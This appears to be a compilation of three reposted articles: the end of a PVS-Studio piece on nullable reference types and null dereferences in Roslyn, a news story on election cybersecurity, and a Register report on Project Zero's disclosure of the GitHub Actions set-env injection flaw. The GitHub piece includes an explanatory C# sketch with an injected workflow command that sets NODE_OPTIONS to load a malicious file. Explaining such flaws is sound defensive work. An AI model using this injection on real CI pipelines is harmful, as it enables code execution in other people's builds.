It's a graphic example of how you can get into trouble with Nullable Reference because the compiler treats Debug.Assert as a reliable check in any configuration. That is, if you add #nullable enable and mark the chainedTupleTypeOpt argument as a nullable reference, the compiler won't issue any warning on the dereference inside the ConstructTupleUnderlyingType method.
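The reason such an assertion offers no protection outside Debug builds is that Debug.Assert is marked [Conditional("DEBUG")], so the compiler drops the call entirely when the DEBUG symbol is not defined. A minimal sketch of the pattern (the method below is made up for the example, not taken from Roslyn):

#nullable enable
using System.Diagnostics;

public static class AssertDemo
{
    public static int GetLength(string? text)
    {
        // In a Debug build a null argument trips this assertion.
        // In a Release build the call is compiled out, so nothing guards the
        // dereference below and a null argument becomes a NullReferenceException,
        // even though, as described above, the compiler's nullable analysis
        // treats the assert as a valid check.
        Debug.Assert(text != null);

        return text.Length;
    }
}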
Moving on to other examples of warnings issued by PVS-Studio.

V3080 Possible null dereference. Consider inspecting 'effectiveRuleset'. RuleSet.cs 146

var effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths);
effectiveRuleset = effectiveRuleset.WithEffectiveAction(ruleSetInclude.Action);
if (IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, ....))
    effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption;

This warning says that the call to the WithEffectiveAction method may return null, while the return value assigned to the variable effectiveRuleset is not checked before use (effectiveRuleset.GeneralDiagnosticOption). Here's the body of the WithEffectiveAction method:

public RuleSet WithEffectiveAction(ReportDiagnostic action)
{
    if (!_includes.IsEmpty)
        throw new ArgumentException(....);

    switch (action)
    {
        case ReportDiagnostic.Default:
            return this;
        case ReportDiagnostic.Suppress:
            return null;
        ....
            return new RuleSet(....);
        default:
            return null;
    }
}

With Nullable Reference enabled for the method GetEffectiveRuleSet, we'll get two locations where the code's behavior has to be changed. Since the method shown above can throw an exception, it's logical to assume that the call to it is wrapped in a try-catch block, and it would be correct to rewrite the method to throw an exception rather than return null. However, if you trace a few calls back, you'll see that the catching code is too far up to reliably predict the consequences.

Let's take a look at the consumer of the effectiveRuleset variable, the IsStricterThan method:

private static bool IsStricterThan(ReportDiagnostic action1, ReportDiagnostic action2)
{
    switch (action2)
    {
        case ReportDiagnostic.Suppress:
            ....;
        case ReportDiagnostic.Warn:
            return action1 == ReportDiagnostic.Error;
        case ReportDiagnostic.Error:
            return false;
        default:
            return false;
    }
}

As you can see, it's a simple switch statement choosing between two enumerations, with ReportDiagnostic.Default as the default value. So it would be best to rewrite the call as follows.

The signature of WithEffectiveAction will change:

#nullable enable

public RuleSet? WithEffectiveAction(ReportDiagnostic action)

This is what the call will look like:

RuleSet? effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths);
effectiveRuleset = effectiveRuleset?.WithEffectiveAction(ruleSetInclude.Action);

if (IsStricterThan(effectiveRuleset?.GeneralDiagnosticOption ?? ReportDiagnostic.Default, effectiveGeneralOption))
    effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption;

Since IsStricterThan only performs a comparison, the condition can be rewritten - for example, like this:

if (effectiveRuleset == null ||
    IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, effectiveGeneralOption))

Next example. V3080 Possible null dereference. Consider inspecting 'propertySymbol'. BinderFactory.BinderFactoryVisitor.cs 372

var propertySymbol = GetPropertySymbol(parent, resultBinder);
var accessor = propertySymbol.GetMethod;

if ((object)accessor != null)
    resultBinder = new InMethodBinder(accessor, resultBinder);

To fix this warning, we need to see what happens to the propertySymbol variable next.

private SourcePropertySymbol GetPropertySymbol(
    BasePropertyDeclarationSyntax basePropertyDeclarationSyntax,
    Binder outerBinder)
{
    ....
    NamedTypeSymbol container = GetContainerType(outerBinder, basePropertyDeclarationSyntax);

    if ((object)container == null)
        return null;
    ....
    return (SourcePropertySymbol)GetMemberSymbol(propertyName, basePropertyDeclarationSyntax.Span, container, SymbolKind.Property);
}

The GetMemberSymbol method, too, can return null under certain conditions.
private Symbol GetMemberSymbol(
    string memberName,
    TextSpan memberSpan,
    NamedTypeSymbol container,
    SymbolKind kind)
{
    foreach (Symbol sym in container.GetMembers(memberName))
    {
        if (sym.Kind != kind)
            continue;

        if (sym.Kind == SymbolKind.Method)
        {
            ....
            var implementation = ((MethodSymbol)sym).PartialImplementationPart;
            if ((object)implementation != null)
                if (InSpan(implementation.Locations[0], this.syntaxTree, memberSpan))
                    return implementation;
        }
        else if (InSpan(sym.Locations, this.syntaxTree, memberSpan))
            return sym;
    }

    return null;
}

With nullable reference types enabled, the call will change to this:

#nullable enable

SourcePropertySymbol? propertySymbol = GetPropertySymbol(parent, resultBinder);
MethodSymbol? accessor = propertySymbol?.GetMethod;

if ((object)accessor != null)
    resultBinder = new InMethodBinder(accessor, resultBinder);

It's pretty easy to fix when you know where to look. Static analysis can catch this potential error with no effort by collecting all possible values of the field from all the procedure call chains.

V3080 Possible null dereference. Consider inspecting 'simpleName'. CSharpCommandLineParser.cs 1556

string simpleName;
simpleName = PathUtilities.RemoveExtension(PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path));
outputFileName = simpleName + outputKind.GetDefaultExtension();

if (simpleName.Length == 0 && !outputKind.IsNetModule())
    ....

The problem is in the line with the simpleName.Length check. The variable simpleName results from executing a long series of methods and can be assigned null. By the way, if you are curious, you could look at the RemoveExtension method to see how it differs from Path.GetFileNameWithoutExtension. A simpleName != null check would be enough, but with non-nullable reference types the code will change to something like this:

#nullable enable

public static string? RemoveExtension(string path)
{
    ....
}

string simpleName;

This is what the call might look like:

simpleName = PathUtilities.RemoveExtension(PathUtilities.GetFileName(sourceFiles.FirstOrDefault().Path)) ?? String.Empty;

Conclusion

Nullable Reference types can be a great help when designing architecture from scratch, but reworking existing code may require a lot of time and care, as it may lead to a number of elusive bugs. This article doesn't aim to discourage you from using Nullable Reference types. We find this new feature generally useful, even though the exact way it is implemented may be controversial. However, always remember the limitations of this approach and keep in mind that enabling Nullable Reference mode doesn't protect you from NREs and that, when misused, it could itself become the source of these errors. We recommend that you complement the Nullable Reference feature with a modern static analysis tool, such as PVS-Studio, that supports interprocedural analysis to protect your program from NREs. Each of these approaches - deep interprocedural analysis and annotating method signatures (which is in fact what Nullable Reference mode does) - has its own pros and cons. The analyzer will provide you with a list of potentially dangerous locations and let you see the consequences of modifying existing code. If there is a null assignment somewhere, the analyzer will point at every consumer of the variable where it is dereferenced without a check. You can check this project or your own projects for other defects - just download PVS-Studio and give it a try.

Source
-
© Greg Nash

Officials on alert for potential cyber threats after a quiet Election Day

Election officials are cautiously declaring victory after no reports of major cyber incidents on Election Day. But the long shadow of 2016, when the U.S. fell victim to extensive Russian interference, has those same officials on guard for potential attacks as key battleground states tally up the remaining ballots.

Agencies that have worked to bolster election security over the past few years are still on high alert during the vote-counting process, noting that the election is not over even if ballots have already been cast.

Election officials at all levels of government have been hyper-focused on the security of the voting process since 2016, when the nation was caught off guard by a sweeping and sophisticated Russian interference effort that included targeting election infrastructure in all 50 states, with Russian hackers gaining access to voter registration systems in Florida and Illinois. While there was no evidence that any votes were changed or voters prevented from casting a ballot, the targeted efforts brought renewed focus to the cybersecurity of voting infrastructure and helped improve ties between the federal government and state and local election officials.

In the intervening years, former DHS Secretary Jeh Johnson designated elections as critical infrastructure, and Trump signed into law legislation in 2018 creating CISA, now the main agency coordinating with state and local election officials on security issues. In advance of Election Day, CISA established a 24/7 operations center to help coordinate with state and local officials, along with social media companies, election machine vendors and other stakeholders. Hovland, who was in the operations center Tuesday, cited enhanced coordination as a key factor in securing this year's election, along with cybersecurity enhancements including sensors on infrastructure in all 50 states to detect intrusions.

Top officials were cautiously optimistic Wednesday about how things went. Sen. Mark Warner (D-Va.), the ranking member on the Senate Intelligence Committee, said it was clear agencies including Homeland Security, the FBI and the intelligence community had "learned a ton of lessons from 2016." He cautioned that "we're almost certain to discover something we missed in the coming weeks, but at the moment it looks like these preparations were fairly effective in defending our infrastructure."

A major election security question on Capitol Hill over the past four years has been how to address these threats, particularly during the COVID-19 pandemic, when election officials were presented with new challenges and funding woes. Congress has appropriated more than $800 million for states to enhance election security since 2018, along with an additional $400 million in March to address pandemic-related obstacles. But Democrats and election experts have argued the $800 million was just a fraction of what's required to fully address security threats, such as funding permanent cybersecurity professionals in every voting jurisdiction and updating vulnerable and outdated election equipment.

Threats from foreign interference have not disappeared, and threats to elections will almost certainly continue as votes are tallied, and into future elections.
A senior CISA official told reporters late Tuesday night that the agency was watching for threats including disinformation, the defacement of election websites, distributed denial-of-service attacks on election systems, and increased demand on vote-reporting sites taking systems offline. Election Day also came only weeks after Director of National Intelligence John Ratcliffe and other federal officials announced that Russia and Iran had obtained U.S. voter data and were attempting to interfere in the election process, which only underlined those threats.

Via msn.com
-
- 1
-
A case of "you have no relatives in the U.S.A."
-
Code shack describes issue as 'moderate' security flaw, plans to disable risky commands gradually

Google's bug-hunting Project Zero team has posted details of an injection vulnerability in GitHub Actions after refusing a request to postpone disclosure.

The issue arises due to the ability to set environment variables that are then parsed for execution by GitHub Actions. According to the Project Zero disclosure: "As the runner process parses every line printed to STDOUT looking for workflow commands, every Github action that prints untrusted content as part of its execution is vulnerable. In most cases, the ability to set arbitrary environment variables results in remote code execution as soon as another workflow is executed."

The problem was discovered in July and reported to GitHub, which issued an advisory deprecating the vulnerable commands, set-env and add-path. GitHub also posted a description of the issue, which means that the information posted by Project Zero, while more detailed and including examples, is not such a big reveal. The security hole was assigned CVE-2020-15228 and rated as medium severity.

It's hard to fix, as Project Zero researcher Felix Wilhelm noted: "The way workflow commands are implemented is fundamentally insecure." GitHub's solution is to gradually remove the risky commands. The trade-off is that removing the commands will break workflows that use them, but leaving them in place means the vulnerability remains, so folks will be eased off the functionality over time.

The Project Zero timeline indicates some frustration with GitHub's response. Normally bug reports are published 90 days after a report is sent to the vendor, or whenever a problem is fixed, whichever is sooner, though this can be extended. On 12 October Project Zero said it told GitHub "that a grace period is available" if it needed more time to disable the vulnerable commands. The response from GitHub was to request a standard 14-day extension to 2 November.

On 30 October, Google noted: "Due to no response and the deadline closing in, Project Zero reaches out to other informal Github contacts. The response is that the issue is considered fixed and that we are clear to go public on 2020-11-02 as planned." The implication of that statement is that the post might have been further delayed, yet when GitHub then requested an additional 48 hours "to notify customers," Project Zero said there was "no option to further extend the deadline as this is day 104 (90 days + 14 day grace extension)."

Mark Penny, a security researcher at nCipher Security, said on Twitter: GitHub has not ignored the problem, but rather has taken steps towards eventually disabling the insecure feature and providing users with an alternative, so it is hard to see the benefit in disclosure other than in the general sense of putting pressure on vendors to come up with speedy fixes.

November has not started well for GitHub. The second day of the month saw the site broken by an expired SSL certificate. Along with all the Twitter complaints, one user found something to be grateful for: "@github your certificate for the assets is expired today … Thanks for showing us that this can happen to everyone, small and big companies." ®

Via theregister.com
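As an aside on the parsing behaviour Project Zero describes, the sketch below is a simplified C# illustration (it is not GitHub's actual runner code, and the NODE_OPTIONS value is just an example of an attacker-chosen payload): any STDOUT line that looks like the deprecated ::set-env command becomes an environment variable for later steps, which is why a step that merely echoes untrusted content can hand control of the environment to an attacker.

using System;
using System.Collections.Generic;

// Simplified illustration only: not the real GitHub Actions runner.
public static class WorkflowCommandSketch
{
    public static void Main()
    {
        var capturedEnvironment = new Dictionary<string, string>();

        // Pretend these lines are the STDOUT of a step that echoes
        // untrusted content (an issue title, a branch name, and so on).
        string[] stepOutput =
        {
            "Building pull request 'harmless title'",
            "::set-env name=NODE_OPTIONS::--require /tmp/evil.js",
        };

        foreach (string line in stepOutput)
        {
            const string prefix = "::set-env name=";
            if (!line.StartsWith(prefix, StringComparison.Ordinal))
            {
                continue;
            }

            int separator = line.IndexOf("::", prefix.Length, StringComparison.Ordinal);
            if (separator < 0)
            {
                continue;
            }

            // A real runner would export this variable to every later step in
            // the job, which is where the remote code execution comes from.
            string name = line.Substring(prefix.Length, separator - prefix.Length);
            string value = line.Substring(separator + 2);
            capturedEnvironment[name] = value;
        }

        foreach (KeyValuePair<string, string> entry in capturedEnvironment)
        {
            Console.WriteLine($"{entry.Key} = {entry.Value}");
        }
    }
}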
-
- 1